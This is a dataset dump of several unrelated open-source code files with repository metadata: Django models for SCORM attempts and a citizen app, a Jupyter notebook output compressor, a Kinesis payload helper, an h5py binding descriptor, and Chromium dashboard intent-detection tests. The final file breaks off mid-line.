ScormElementQuerySet(models.QuerySet): def current(self,key): """ Return the last value of this field """ elements = self.filter(key=key).order_by('-time','-counter') if not elements.exists(): raise ScormElement.DoesNotExist() else: return elements.first() class ScormElementManager(models.Manager): use_for_related_fields = True def get_queryset(self): return ScormElementQuerySet(self.model, using=self.db) def current(self,key): return self.get_queryset().current(key) class ScormElement(models.Model): objects = ScormElementManager() attempt = models.ForeignKey(Attempt,on_delete=models.CASCADE,related_name='scormelements') key = models.CharField(max_length=200) value = models.TextField() time = models.DateTimeField() counter = models.IntegerField(default=0,verbose_name='Element counter to disambiguate elements with the same timestamp') current = models.BooleanField(default=True) # is this the latest version? class Meta: ordering = ['-time','-counter'] def __str__(self): return '{}: {}'.format(self.key,self.value[:50]+(self.value[50:] and '...')) def newer_than(self, other): return self.time>other.time or (self.time==other.time and self.counter>other.counter) @receiver(models.signals.post_save,sender=ScormElement) def send_scorm_element_to_dashboard(sender,instance,created,**kwargs): Group(instance.attempt.channels_group()).send({ "text": json.dumps({ 'key': instance.key, 'value': instance.value, 'time': instance.time.strftime('%Y-%m-%d %H:%M:%S'), }) }) @receiver(models.signals.post_save,sender=ScormElement) def scorm_set_score(sender,instance,created,**kwargs): if instance.key!='cmi.score.scaled' or not created: return if not (instance.attempt.scaled_score_element is None or instance.newer_than(instance.attempt.scaled_score_element)): return instance.attempt.scaled_score = float(instance.value) instance.attempt.scaled_score_element = instance instance.attempt.save() if instance.attempt.resource.report_mark_time == 'immediately': try: report_outcome_for_attempt(instance.attempt) except (ReportOutcomeFailure, ReportOutcomeConnectionError): pass @receiver(models.signals.post_save,sender=ScormElement) def scorm_set_completion_status(sender,instance,created,**kwargs): if instance.key!='cmi.completion_status' or not created: return if not (instance.attempt.completion_status_element is None or instance.newer_than(instance.attempt.completion_status_element)): return instance.attempt.completion_status = instance.value instance.attempt.completion_status_element = instance if instance.value=='completed' and instance.attempt.end_time is None: instance.attempt.end_time = timezone.now() group_for_attempt(instance.attempt).send({'text':json.dumps({ 'completion_status':'completed', })}) instance.attempt.save() if instance.attempt.resource.report_mark_time == 'oncompletion' and instance.value=='completed': try: report_outcome_for_attempt(instance.attempt) except (ReportOutcomeFailure, ReportOutcomeConnectionError): pass @receiver(models.signals.post_save,sender=ScormElement) def scorm_set_num_questions(sender,instance,created,**kwargs): """ Set the number of questions for this resource - can only work this out once the exam has been run! """ if not re.match(r'^cmi.objectives.([0-9]+).id$',instance.key) or not created: return number = int(re.match(r'q(\d+)',instance.value).group(1))+1 resource = instance.attempt.resource if number>resource.num_questions: resource.num_questions = number resource.save() class EditorLink(models.Model): name = models.CharField(max_length=200,verbose_name='Editor name') url = models.URLField(verbose_name='Base URL of the editor',unique=True) cached_available_exams = models.TextField(blank=True,editable=False,verbose_name='Cached JSON list of available exams from this editor') last_cache_update = models.DateTimeField(blank=True,editable=False,verbose_name='Time of last cache update') def __str__(self): return self.name def update_cache(self,bounce=True): if bounce and self.time_since_last_update().seconds<30: return if self.projects.exists(): project_pks = [str(p.remote_id) for p in self.projects.all()] r = requests.get('{}/api/available-exams'.format(self.url),{'projects':project_pks}) self.cached_available_exams = r.text else: self.cached_available_exams = '[]' self.last_cache_update = timezone.now() def time_since_last_update(self): if self.last_cache_update is None: return timedelta.max return timezone.now() - self.last_cache_update @property def available_exams(self): if self.time_since_last_update().seconds> 30: Channel("editorlink.update_cache").send({'pk':self.pk}) if self.cached_available_exams: return json.loads(self.cached_available_exams) else: return [] class EditorLinkProject(models.Model): editor = models.ForeignKey(EditorLink,on_delete=models.CASCADE,related_name='projects',verbose_name='Editor that this project belongs to') name = models.CharField(max_length=200,verbose_name='Name of the project') description = models.TextField(blank=True,verbose_name='Description of the project') remote_id = models.IntegerField(verbose_name='ID of the project on the editor') homepage = models.URLField(verbose_name='URL of the project\'s homepage on the editor') rest_url = models.URLField(verbose_name='URL of the project on the editor\'s REST API') class Meta: ordering = ['name'] def __str__(self): return self.name @receiver(models.signals.pre_save,sender=EditorLink) def update_editor_cache_before_save(sender,instance,**kwargs): instance.update_cache() class StressTest(models.Model): resource = models.OneToOneField(Resource,on_delete=models.CASCADE,primary_key=True) def __str__(self): return self.resource.creation_time.strftime('%B %d, %Y %H:%M') def get_absolute_url(self): return reverse('view_stresstest',args=(self.pk,)) class StressTestNote(models.Model): stresstest = models.ForeignKey(StressTest,on_delete=models.CASCADE,related_name='notes') text = models.TextField() time = models.DateTimeField(auto_now_add=True)
12,860
11,495
663
c2dec3dcd5aba4c26930d56a78814b05201b9fd5
2,763
py
Python
nb_compress.py
tanakatsu/nb_compress
a1fe923c4b271ce399e1550e51e6bfa354681c06
[ "MIT" ]
null
null
null
nb_compress.py
tanakatsu/nb_compress
a1fe923c4b271ce399e1550e51e6bfa354681c06
[ "MIT" ]
null
null
null
nb_compress.py
tanakatsu/nb_compress
a1fe923c4b271ce399e1550e51e6bfa354681c06
[ "MIT" ]
null
null
null
import json import re import argparse import sys if __name__ == '__main__': main()
30.7
106
0.579081
import json import re import argparse import sys def eprint(*args, **kwargs): print(*args, file=sys.stderr, **kwargs) def compress_output(output, mode): if "text" in output and mode['first_last_epoch']: text = output["text"] mask = False _text = [] for line in text: m = re.search('^Epoch (\d+)/(\d+)', line) if m: total = m.group(2) cur = m.group(1) if cur == "2": mask = True elif cur == total: mask = False if not mask: _text.append(line) output["text"] = _text if "traceback" in output and mode['no_traceback']: output["traceback"] = [] if "data" in output and mode['no_image']: output_data = output["data"] if "image/png" in output_data: output_data["image/png"] = "" return output def main(): parser = argparse.ArgumentParser() parser.add_argument('file', type=str, help='input ipython notebook file') parser.add_argument('-o', '--output', type=str, help='output filename') parser.add_argument('--first-last-epoch', action='store_true', help='show first and last epochs only') parser.add_argument('--no-image', action='store_true', help='cut image code') parser.add_argument('--no-traceback', action='store_true', help='cut traceback code') parser.add_argument('--no-execution-count', action='store_true', help='clear execution count') args = parser.parse_args() mode = {} mode['first_last_epoch'] = args.first_last_epoch mode['no_image'] = args.no_image mode['no_traceback'] = args.no_traceback mode['no_execution_count'] = args.no_execution_count if mode['first_last_epoch']: eprint('Apply filter: first_last_epoch') if mode['no_image']: eprint('Apply filter: no_image') if mode['no_traceback']: eprint('Apply filter: no_tracekback') if mode['no_execution_count']: eprint('Apply filter: no_execution_count') with open(args.file) as f: data = json.load(f) cells = [] for cell in data["cells"]: if cell["cell_type"] == "code": outputs = cell["outputs"] if len(outputs) > 0: cell["outputs"] = [compress_output(o, mode) for o in outputs] if mode['no_execution_count']: cell["execution_count"] = None cells.append(cell) data["cells"] = cells if args.output: with open(args.output, "w") as f: jsonStr = json.dumps(data) f.write(jsonStr) eprint('Finished.') else: print(json.dumps(data)) if __name__ == '__main__': main()
2,603
0
69
d43678988ad4c195277e0b62eb974c64a085ba2d
827
py
Python
src/utils/payloadHelper.py
gertschreuder/kinesis-consumer
cfd0dc4fb2ae98f4b54838d390cea0488bbbb975
[ "MIT" ]
null
null
null
src/utils/payloadHelper.py
gertschreuder/kinesis-consumer
cfd0dc4fb2ae98f4b54838d390cea0488bbbb975
[ "MIT" ]
1
2021-02-10T11:06:38.000Z
2021-02-10T11:06:38.000Z
src/utils/payloadHelper.py
gertschreuder/kinesis-consumer
cfd0dc4fb2ae98f4b54838d390cea0488bbbb975
[ "MIT" ]
null
null
null
import json from src.mappers.heartbeatMapper import Heartbeat
24.323529
59
0.61185
import json from src.mappers.heartbeatMapper import Heartbeat class PayloadHelper(object): def __init__(self): self.heartbeat = None self.messageTimeStamp = None def map(self, data): self.meta(data) self.resolveStatus(data) return self def meta(self, data): if "MessageId" in data: k, t = data["MessageId"].split("_TS") self.resolveMessageId(k) self.resolveTimeStamp(t) def resolveMessageId(self, data): self.messageId = data.split(":")[1] def resolveTimeStamp(self, data): self.messageTimeStamp = data.split(":")[1] def resolveStatus(self, data): if "Status" in data and data["Status"] is not None: self.heartbeat = Heartbeat(data["Status"]) return self.heartbeat
572
7
184
70deaa73a8457f76f76ea1cbe027b3e157405f0d
4,002
py
Python
python/h5/_h5py_desc.py
phdum/h5
d5f1b02354fd93da55cd09dc6a83218d98adab76
[ "Apache-2.0" ]
null
null
null
python/h5/_h5py_desc.py
phdum/h5
d5f1b02354fd93da55cd09dc6a83218d98adab76
[ "Apache-2.0" ]
null
null
null
python/h5/_h5py_desc.py
phdum/h5
d5f1b02354fd93da55cd09dc6a83218d98adab76
[ "Apache-2.0" ]
null
null
null
# Generated automatically using the command : # c++2py h5py_io.hpp --members_read_only -N h5 -a _h5py -m _h5py -o _h5py --moduledoc="A lightweight hdf5 python interface" --cxxflags="-std=c++20" --includes=./../../c++ --only="object file group h5_read_bare h5_write_bare" from cpp2py.wrap_generator import * # The module module = module_(full_name = "_h5py", doc = r"A lightweight hdf5 python interface", app_name = "_h5py") # Imports # Add here all includes module.add_include("<h5py_io.hpp>") # Add here anything to add in the C++ code at the start, e.g. namespace using module.add_preamble(""" #include <cpp2py/converters/span.hpp> #include <cpp2py/converters/string.hpp> #include <cpp2py/converters/vector.hpp> using namespace h5; """) # The class file c = class_( py_type = "File", # name of the python class c_type = "file", # name of the C++ class doc = r"""A little handler for the HDF5 file The class is basically a pointer to the file.""", # doc of the C++ class hdf5 = False, ) c.add_constructor("""()""", doc = r"""Open a file in memory""") c.add_constructor("""(std::string name, char mode)""", doc = r"""""") c.add_constructor("""(std::span<std::byte> buf)""", doc = r"""Create a file in memory from a byte buffer""") c.add_property(name = "name", getter = cfunction("""std::string name ()"""), doc = r"""Name of the file""") c.add_method("""void flush ()""", doc = r"""Flush the file""") c.add_method("""std::vector<std::byte> as_buffer ()""", doc = r"""Get a copy of the associated byte buffer""") module.add_class(c) # The class group c = class_( py_type = "Group", # name of the python class c_type = "group", # name of the C++ class doc = r"""HDF5 group""", # doc of the C++ class hdf5 = False, ) c.add_constructor("""(file f)""", doc = r"""Takes the "/" group at the top of the file""") c.add_property(name = "name", getter = cfunction("""std::string name ()"""), doc = r"""Name of the group""") c.add_method("""group open_group (std::string key)""", doc = r"""Open a subgroup. Throws std::runtime_error if it does not exist. Parameters ---------- key The name of the subgroup. If empty, return this group""") c.add_method("""group create_group (std::string key, bool delete_if_exists = true)""", doc = r"""Create a subgroup in this group Parameters ---------- key The name of the subgroup. If empty, return this group. delete_if_exists Unlink the group if it exists""") c.add_method("""std::vector<std::string> get_all_subgroup_dataset_names ()""", name='keys', doc = r"""Returns all names of dataset of G""") c.add_property(name = "file", getter = cfunction("""file get_file ()"""), doc = r"""The parent file""") c.add_method("""bool has_subgroup (std::string key)""", doc = r"""True iff key is a subgroup of this. Parameters ---------- key""") c.add_method("""bool has_dataset (std::string key)""", doc = r"""True iff key is a dataset of this. Parameters ---------- key""") c.add_method("void write_attribute(std::string key, std::string val)", calling_pattern = "h5_write_attribute(self_c, key, val)", doc = "Write an attribute") c.add_method("std::string read_attribute(std::string name)", calling_pattern = "std::string result = h5_read_attribute<std::string>(self_c, name)", doc = "Read an attribute") c.add_method("std::string read_hdf5_format_from_key(std::string key)", calling_pattern = "std::string result; read_hdf5_format_from_key(self_c, key, result);", doc = "Read the format string from the key in the group") module.add_class(c) module.add_function (name = "h5_write", signature = "void h5_write_bare (group g, std::string name, PyObject * ob)", doc = r"""""") module.add_function (name = "h5_read", signature = "PyObject * h5_read_bare (group g, std::string name)", doc = r"""""") module.generate_code()
33.915254
224
0.643428
# Generated automatically using the command : # c++2py h5py_io.hpp --members_read_only -N h5 -a _h5py -m _h5py -o _h5py --moduledoc="A lightweight hdf5 python interface" --cxxflags="-std=c++20" --includes=./../../c++ --only="object file group h5_read_bare h5_write_bare" from cpp2py.wrap_generator import * # The module module = module_(full_name = "_h5py", doc = r"A lightweight hdf5 python interface", app_name = "_h5py") # Imports # Add here all includes module.add_include("<h5py_io.hpp>") # Add here anything to add in the C++ code at the start, e.g. namespace using module.add_preamble(""" #include <cpp2py/converters/span.hpp> #include <cpp2py/converters/string.hpp> #include <cpp2py/converters/vector.hpp> using namespace h5; """) # The class file c = class_( py_type = "File", # name of the python class c_type = "file", # name of the C++ class doc = r"""A little handler for the HDF5 file The class is basically a pointer to the file.""", # doc of the C++ class hdf5 = False, ) c.add_constructor("""()""", doc = r"""Open a file in memory""") c.add_constructor("""(std::string name, char mode)""", doc = r"""""") c.add_constructor("""(std::span<std::byte> buf)""", doc = r"""Create a file in memory from a byte buffer""") c.add_property(name = "name", getter = cfunction("""std::string name ()"""), doc = r"""Name of the file""") c.add_method("""void flush ()""", doc = r"""Flush the file""") c.add_method("""std::vector<std::byte> as_buffer ()""", doc = r"""Get a copy of the associated byte buffer""") module.add_class(c) # The class group c = class_( py_type = "Group", # name of the python class c_type = "group", # name of the C++ class doc = r"""HDF5 group""", # doc of the C++ class hdf5 = False, ) c.add_constructor("""(file f)""", doc = r"""Takes the "/" group at the top of the file""") c.add_property(name = "name", getter = cfunction("""std::string name ()"""), doc = r"""Name of the group""") c.add_method("""group open_group (std::string key)""", doc = r"""Open a subgroup. Throws std::runtime_error if it does not exist. Parameters ---------- key The name of the subgroup. If empty, return this group""") c.add_method("""group create_group (std::string key, bool delete_if_exists = true)""", doc = r"""Create a subgroup in this group Parameters ---------- key The name of the subgroup. If empty, return this group. delete_if_exists Unlink the group if it exists""") c.add_method("""std::vector<std::string> get_all_subgroup_dataset_names ()""", name='keys', doc = r"""Returns all names of dataset of G""") c.add_property(name = "file", getter = cfunction("""file get_file ()"""), doc = r"""The parent file""") c.add_method("""bool has_subgroup (std::string key)""", doc = r"""True iff key is a subgroup of this. Parameters ---------- key""") c.add_method("""bool has_dataset (std::string key)""", doc = r"""True iff key is a dataset of this. Parameters ---------- key""") c.add_method("void write_attribute(std::string key, std::string val)", calling_pattern = "h5_write_attribute(self_c, key, val)", doc = "Write an attribute") c.add_method("std::string read_attribute(std::string name)", calling_pattern = "std::string result = h5_read_attribute<std::string>(self_c, name)", doc = "Read an attribute") c.add_method("std::string read_hdf5_format_from_key(std::string key)", calling_pattern = "std::string result; read_hdf5_format_from_key(self_c, key, result);", doc = "Read the format string from the key in the group") module.add_class(c) module.add_function (name = "h5_write", signature = "void h5_write_bare (group g, std::string name, PyObject * ob)", doc = r"""""") module.add_function (name = "h5_read", signature = "PyObject * h5_read_bare (group g, std::string name)", doc = r"""""") module.generate_code()
0
0
0
467ad5dbc7ae14468d001e76f9f66437da261324
13,803
py
Python
internals/detect_intent_test.py
www-business-com/chromium-dashboard
f7b9c5136f4cfee4adbfca872335eb9c455b071b
[ "Apache-2.0" ]
1
2022-03-25T14:40:37.000Z
2022-03-25T14:40:37.000Z
internals/detect_intent_test.py
BossNetworking/chromium-dashboard
9f0d76e70ef5e6169552407e728b3d3205517da8
[ "Apache-2.0" ]
null
null
null
internals/detect_intent_test.py
BossNetworking/chromium-dashboard
9f0d76e70ef5e6169552407e728b3d3205517da8
[ "Apache-2.0" ]
1
2021-11-15T06:49:12.000Z
2021-11-15T06:49:12.000Z
# Copyright 2021 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import testing_config # Must be imported first import flask from unittest import mock import werkzeug from internals import models from internals import approval_defs from internals import detect_intent test_app = flask.Flask(__name__)
40.716814
80
0.701152
# Copyright 2021 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import testing_config # Must be imported first import flask from unittest import mock import werkzeug from internals import models from internals import approval_defs from internals import detect_intent test_app = flask.Flask(__name__) class FunctionTest(testing_config.CustomTestCase): def setUp(self): self.feature_1 = models.Feature( name='feature one', summary='detailed sum', category=1, visibility=1, standardization=1, web_dev_views=1, impl_status_chrome=1, intent_stage=models.INTENT_IMPLEMENT) self.feature_1.put() def tearDown(self): self.feature_1.key.delete() def test_detect_field(self): """We can detect intent thread type by subject line.""" test_data = { approval_defs.PrototypeApproval: [ 'Intent to Prototype: Something cool', 'Re: Re:Intent to Prototype: Something cool', 'intent to prototype: something cool', 'Intent to Prototype request for Something cool', ], approval_defs.ExperimentApproval: [ 'Intent to Experiment: Something cool', 'intent to experiment: something cool', 'Intent to experiment on Something cool', ], approval_defs.ExtendExperimentApproval: [ 'Intent to Continue Experiment: Something cool', 'Intent to Extend Experiment: Something cool', 'Intent to Continue Experiment: Something cool', ], approval_defs.ShipApproval: [ 'Intent to Ship: Something cool', 'intent to ship: something cool', 'Intent to ship request for Something cool', ], None: [ 'Status of something cool', '[meta] Are Intent to Prototype threads too long?', 'PSA: We are making changes', 'Why is feature so cool?', 'Save the date for BlinkOn', ], } for expected, subjects in test_data.items(): for subject in subjects: with self.subTest(subject=subject): actual = detect_intent.detect_field(subject) self.assertEqual(expected, actual) def test_detect_feature_id__generated(self): """We can parse the feature ID from a link in the generated body.""" body = ( 'blah blah blah\n' 'Link to entry on the Chrome Platform Status\n' 'https://www.chromestatus.com/feature/5144822362931200\n' 'blah blah blah') self.assertEqual( 5144822362931200, detect_intent.detect_feature_id(body)) def test_detect_feature_id__generated_no_www(self): """We can parse the feature ID from a link in the generated body.""" body = ( 'blah blah blah\n' 'Link to entry on the Chrome Platform Status\n' 'http://chromestatus.com/feature/5144822362931200\n' 'blah blah blah') self.assertEqual( 5144822362931200, detect_intent.detect_feature_id(body)) def test_detect_feature_id__alternative(self): """We can parse the feature ID from another common link.""" body = ( 'blah blah blah\n' 'Entry on the feature dashboard\n' 'https://www.chromestatus.com/feature/5144822362931200\n' 'blah blah blah') self.assertEqual( 5144822362931200, detect_intent.detect_feature_id(body)) def test_detect_feature_id__alternative_no_www(self): """We can parse the feature ID from another common link.""" body = ( 'blah blah blah\n' 'Entry on the feature dashboard\n' 'http://chromestatus.com/feature/5144822362931200\n' 'blah blah blah') self.assertEqual( 5144822362931200, detect_intent.detect_feature_id(body)) def test_detect_feature_id__quoted(self): """We can parse the feature ID from link in quoted body text.""" body = ( 'I have something more to add\n' '\n' 'On Monday, November 29, 2021 at 3:49:24 PM UTC-8 a user wrote:\n' '>>> Entry on the feature dashboard\n' '>>> http://chromestatus.com/feature/5144822362931200\n' '>>> blah blah blah') self.assertEqual( 5144822362931200, detect_intent.detect_feature_id(body)) def test_detect_thread_url(self): """We can parse the thread archive link from the body footer.""" footer = ( 'You received this message because you are subscribed to the Google ' 'Groups "blink-dev" group.\n' 'To unsubscribe from this group and stop receiving emails from it,' 'send an email to blink-dev+unsubscribe@chromium.org.\n' 'To view this discussion on the web visit https://groups.google.com' '/a/chromium.org/d/msgid/blink-dev/CAMO6jDPGfXfE5z6hJcWO112zX3We' '-oNTb%2BZjiJk%2B6RNb9%2Bv05w%40mail.gmail.com.') self.assertEqual( ('https://groups.google.com' '/a/chromium.org/d/msgid/blink-dev/CAMO6jDPGfXfE5z6hJcWO112zX3We' '-oNTb%2BZjiJk%2B6RNb9%2Bv05w%40mail.gmail.com'), detect_intent.detect_thread_url(footer)) def test_detect_thread_url__staging(self): """We can parse the staging thread archive link from the body footer.""" footer = ( 'You received this message because you are subscribed to the Google ' 'Groups "jrobbins-test" group.\n' 'To unsubscribe from this group and stop receiving emails from it,' 'send an email to jrobbins-test+unsubscribe@googlegroups.com.\n' 'To view this discussion on the web visit https://groups.google.com' '/d/msgid/jrobbins-test/CAMO6jDPGfXfE5z6hJcWO112zX3We' '-oNTb%2BZjiJk%2B6RNb9%2Bv05w%40mail.gmail.com.') self.assertEqual( ('https://groups.google.com' '/d/msgid/jrobbins-test/CAMO6jDPGfXfE5z6hJcWO112zX3We' '-oNTb%2BZjiJk%2B6RNb9%2Bv05w%40mail.gmail.com'), detect_intent.detect_thread_url(footer)) def test_detect_lgtm__good(self): """We can find an LGTM in the email body text.""" self.assertTrue(detect_intent.detect_lgtm('LGTM')) self.assertTrue(detect_intent.detect_lgtm('Lgtm')) self.assertTrue(detect_intent.detect_lgtm('lgtm')) self.assertTrue(detect_intent.detect_lgtm('LGTM1')) self.assertTrue(detect_intent.detect_lgtm('LGTM2')) self.assertTrue(detect_intent.detect_lgtm('LGTM3')) self.assertTrue(detect_intent.detect_lgtm('LGTM with nits')) self.assertTrue(detect_intent.detect_lgtm('This LGTM!')) self.assertTrue(detect_intent.detect_lgtm('Sounds good! LGTM2')) self.assertTrue(detect_intent.detect_lgtm('LGTM to extend M94-M97')) self.assertTrue(detect_intent.detect_lgtm(''' LGTM Thanks for all your work. ''')) def test_detect_lgtm__bad(self): """We don't mistakenly count a message as an LGTM .""" self.assertFalse(detect_intent.detect_lgtm("> LGTM from other approver")) self.assertFalse(detect_intent.detect_lgtm('LG')) self.assertFalse(detect_intent.detect_lgtm('Looks good to me')) self.assertFalse(detect_intent.detect_lgtm('Almost LGTM')) self.assertFalse(detect_intent.detect_lgtm('This is not an LGTM')) self.assertFalse(detect_intent.detect_lgtm('Not LGTM yet')) self.assertFalse(detect_intent.detect_lgtm('You still need LGTM')) self.assertFalse(detect_intent.detect_lgtm("You're missing LGTM")) self.assertFalse(detect_intent.detect_lgtm("You're missing a LGTM")) self.assertFalse(detect_intent.detect_lgtm("You're missing an LGTM")) self.assertFalse(detect_intent.detect_lgtm(''' Any discussion whatsoever that might even include the word LGTM on any line other than the first line. ''')) @mock.patch('internals.approval_defs.get_approvers') def test_is_lgtm_allowed__approver(self, mock_get_approvers): """A user who is in the list of approvers can LGTM.""" mock_get_approvers.return_value = ['owner@example.com'] self.assertTrue(detect_intent.is_lgtm_allowed( 'owner@example.com', self.feature_1, approval_defs.ShipApproval)) mock_get_approvers.assert_called_once_with( approval_defs.ShipApproval.field_id) @mock.patch('framework.permissions.can_admin_site') @mock.patch('internals.approval_defs.get_approvers') def test_is_lgtm_allowed__admin( self, mock_get_approvers, mock_can_admin_site): """A site admin can LGTM.""" mock_get_approvers.return_value = ['owner@example.com'] mock_can_admin_site.return_value = True self.assertTrue(detect_intent.is_lgtm_allowed( 'admin@example.com', self.feature_1, approval_defs.ShipApproval)) @mock.patch('internals.approval_defs.get_approvers') def test_is_lgtm_allowed__other(self, mock_get_approvers): """An average user cannot LGTM.""" mock_get_approvers.return_value = ['owner@example.com'] self.assertFalse(detect_intent.is_lgtm_allowed( 'other@example.com', self.feature_1, approval_defs.ShipApproval)) @mock.patch('internals.models.Approval.get_approvals') def test_detect_new_thread(self, mock_get_approvals): """A thread is new if there are no previous approval values.""" mock_get_approvals.return_value = [] self.assertTrue(detect_intent.detect_new_thread( self.feature_1.key.integer_id(), approval_defs.ShipApproval)) mock_get_approvals.return_value = ['fake approval value'] self.assertFalse(detect_intent.detect_new_thread( self.feature_1.key.integer_id(), approval_defs.ShipApproval)) class IntentEmailHandlerTest(testing_config.CustomTestCase): def setUp(self): self.feature_1 = models.Feature( name='feature one', summary='detailed sum', category=1, visibility=1, standardization=1, web_dev_views=1, impl_status_chrome=1, intent_stage=models.INTENT_IMPLEMENT) self.feature_1.put() self.feature_id = self.feature_1.key.integer_id() self.request_path = '/tasks/detect-intent' self.thread_url = ( 'https://groups.google.com/a/chromium.org/d/msgid/blink-dev/fake') self.entry_link = ( '\n*Link to entry on the Chrome Platform Status*\n' 'https://www.chromestatus.com/feature/%d\n' % self.feature_id) self.footer = ( '\n--\n' 'instructions...\n' '---\n' 'To view this discussion on the web visit ' + self.thread_url + '.') self.review_json_data = { 'from_addr': 'user@example.com', 'subject': 'Intent to Ship: Featurename', 'body': 'Please review. ' + self.entry_link + self.footer, } self.lgtm_json_data = { 'from_addr': 'user@example.com', 'subject': 'Intent to Ship: Featurename', 'body': 'LGTM. ' + self.footer, } self.handler = detect_intent.IntentEmailHandler() def tearDown(self): self.feature_1.key.delete() for appr in models.Approval.query().fetch(None): appr.key.delete() def test_process_post_data__new_thread(self): """When we detect a new thread, we record it as the intent thread.""" with test_app.test_request_context( self.request_path, json=self.review_json_data): actual = self.handler.process_post_data() self.assertEqual(actual, {'message': 'Done'}) created_approvals = list(models.Approval.query().fetch(None)) self.assertEqual(1, len(created_approvals)) appr = created_approvals[0] self.assertEqual(self.feature_id, appr.feature_id) self.assertEqual(approval_defs.ShipApproval.field_id, appr.field_id) self.assertEqual(models.Approval.REVIEW_REQUESTED, appr.state) self.assertEqual('user@example.com', appr.set_by) self.assertEqual(self.feature_1.intent_to_ship_url, self.thread_url) def test_process_post_data__new_thread_just_FYI(self): """When we detect a new thread, it might not require a review.""" self.review_json_data['subject'] = 'Intent to Prototype: featurename' with test_app.test_request_context( self.request_path, json=self.review_json_data): actual = self.handler.process_post_data() self.assertEqual(actual, {'message': 'Done'}) created_approvals = list(models.Approval.query().fetch(None)) self.assertEqual(0, len(created_approvals)) self.assertEqual(self.feature_1.intent_to_implement_url, self.thread_url) @mock.patch('internals.detect_intent.is_lgtm_allowed') def test_process_post_data__lgtm(self, mock_is_lgtm_allowed): """If we get an LGTM, we store the approval value and update the feature.""" mock_is_lgtm_allowed.return_value = True self.feature_1.intent_to_ship_url = self.thread_url self.feature_1.put() with test_app.test_request_context( self.request_path, json=self.lgtm_json_data): actual = self.handler.process_post_data() self.assertEqual(actual, {'message': 'Done'}) created_approvals = list(models.Approval.query().fetch(None)) self.assertEqual(1, len(created_approvals)) appr = created_approvals[0] self.assertEqual(self.feature_id, appr.feature_id) self.assertEqual(approval_defs.ShipApproval.field_id, appr.field_id) self.assertEqual(models.Approval.APPROVED, appr.state) self.assertEqual('user@example.com', appr.set_by) self.assertEqual(self.feature_1.intent_to_ship_url, self.thread_url) self.assertEqual(self.feature_1.i2s_lgtms, ['user@example.com'])
1,575
11,365
46
1c741e6bc69fc8671df5a15c26f40ce7a3bf09f3
2,839
py
Python
paranuara/citizens/models/citizens.py
SPLAYER-HD/Paranuara
5a42f23d761e16e3b486ba04d9185551614f06a5
[ "MIT" ]
null
null
null
paranuara/citizens/models/citizens.py
SPLAYER-HD/Paranuara
5a42f23d761e16e3b486ba04d9185551614f06a5
[ "MIT" ]
4
2021-06-08T20:53:43.000Z
2022-03-12T00:13:51.000Z
paranuara/citizens/models/citizens.py
SPLAYER-HD/RestServiceDjango
5a42f23d761e16e3b486ba04d9185551614f06a5
[ "MIT" ]
null
null
null
"""Citizens model.""" # Django from django.db import models from django.contrib.auth.models import AbstractUser from django.core.validators import RegexValidator # models from paranuara.companies.models import Company # PostgreSQL fields from django.contrib.postgres.fields import JSONField # Utilities from paranuara.utils.models import ParanuaraModel class Citizen(ParanuaraModel, AbstractUser): """Citizen model. Extend from Django's Abstract User, change the username field to email and add some extra fields. """ index = models.IntegerField( unique=True, default=-1 ) favorite_food = models.ManyToManyField( 'foods.Food', related_name='favorite_food' ) has_died = models.BooleanField( 'died', default=False, help_text=( 'Help easily distinguish citizens died or alive. ' ) ) balance = models.DecimalField( max_digits=15, decimal_places=2, default=None ) picture = models.ImageField( 'profile picture', upload_to='paranuara/citizens/pictures/', blank=True, null=True ) age = models.IntegerField( default=-1 ) eyeColor = models.CharField( max_length=50, blank=False ) gender = models.CharField( max_length=6, blank=True ) email = models.EmailField( 'email address', unique=True, error_messages={ 'unique': 'A user with that email already exists.' } ) phone_regex = RegexValidator( regex=r'\+?1?\d{9,15}$', message="Phone number must be entered in the format: +999999999. Up to 15 digits allowed." ) phone = models.CharField( validators=[phone_regex], max_length=20, blank=True ) address = models.CharField( max_length=100, blank=True ) company = models.ForeignKey( Company, related_name='employees_company', on_delete=models.SET_NULL, null=True ) about = models.CharField( max_length=1000, blank=True, null=True ) greeting = models.CharField( max_length=1000, blank=True, null=True ) tags = JSONField( default=None, blank=True, null=True ) REQUIRED_FIELDS = ['has_died', 'eyeColor', 'index'] class Relationship(models.Model): """Class to represent many to many relation between Ctizens""" from_people = models.ForeignKey(Citizen, related_name='from_people', on_delete=models.CASCADE) to_people = models.ForeignKey(Citizen, related_name='to_people', on_delete=models.CASCADE)
22.007752
98
0.62205
"""Citizens model.""" # Django from django.db import models from django.contrib.auth.models import AbstractUser from django.core.validators import RegexValidator # models from paranuara.companies.models import Company # PostgreSQL fields from django.contrib.postgres.fields import JSONField # Utilities from paranuara.utils.models import ParanuaraModel class Citizen(ParanuaraModel, AbstractUser): """Citizen model. Extend from Django's Abstract User, change the username field to email and add some extra fields. """ index = models.IntegerField( unique=True, default=-1 ) favorite_food = models.ManyToManyField( 'foods.Food', related_name='favorite_food' ) has_died = models.BooleanField( 'died', default=False, help_text=( 'Help easily distinguish citizens died or alive. ' ) ) balance = models.DecimalField( max_digits=15, decimal_places=2, default=None ) picture = models.ImageField( 'profile picture', upload_to='paranuara/citizens/pictures/', blank=True, null=True ) age = models.IntegerField( default=-1 ) eyeColor = models.CharField( max_length=50, blank=False ) gender = models.CharField( max_length=6, blank=True ) email = models.EmailField( 'email address', unique=True, error_messages={ 'unique': 'A user with that email already exists.' } ) phone_regex = RegexValidator( regex=r'\+?1?\d{9,15}$', message="Phone number must be entered in the format: +999999999. Up to 15 digits allowed." ) phone = models.CharField( validators=[phone_regex], max_length=20, blank=True ) address = models.CharField( max_length=100, blank=True ) company = models.ForeignKey( Company, related_name='employees_company', on_delete=models.SET_NULL, null=True ) about = models.CharField( max_length=1000, blank=True, null=True ) greeting = models.CharField( max_length=1000, blank=True, null=True ) tags = JSONField( default=None, blank=True, null=True ) REQUIRED_FIELDS = ['has_died', 'eyeColor', 'index'] def get_relations(self): return 